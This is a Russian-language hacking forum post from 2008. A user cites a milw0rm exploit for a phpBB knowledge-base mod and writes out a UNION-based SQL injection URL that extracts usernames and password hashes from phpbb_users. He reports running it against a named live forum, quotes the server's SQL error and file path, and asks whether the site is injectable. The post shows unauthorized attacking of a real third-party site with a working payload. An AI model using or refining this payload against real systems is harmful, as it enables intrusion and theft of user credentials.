Вопрос по багу моду в phpbb(kb.php)

Вопрос по багу моду в phpbb(kb.php)

07.12.2008, 13:56

Azter

Познающий

Регистрация: 01.09.2005

Сообщений: 51

С нами: 10889223

Репутация: 5

Вопрос по багу моду в phpbb(kb.php)

Есть скюль.
http://milw0rm.com/exploits/5243

Код:

kb.php?mode=article&k=1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1

Но в ответ получаю следующее

Цитата:

Could not obtain category information

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY cat_order ASC' at line 3

SELECT * FROM phpbb_kb_categories WHERE parent = 0 AND category_id <> ORDER BY cat_order ASC

Line : 1185
File : /home/balansk/public_html/includes/functions_kb.php

ВОт сам форум balans.kz/index.php

Сам вопрос - так есть там скуля или просто ошибку выбивает? Просто сначала подумал что просто количество колонок не подходит, потом попробовал - подобрать что-то ничего не получилось....

Спасибо!

𝕏 Twitter Reddit Telegram Копировать ссылку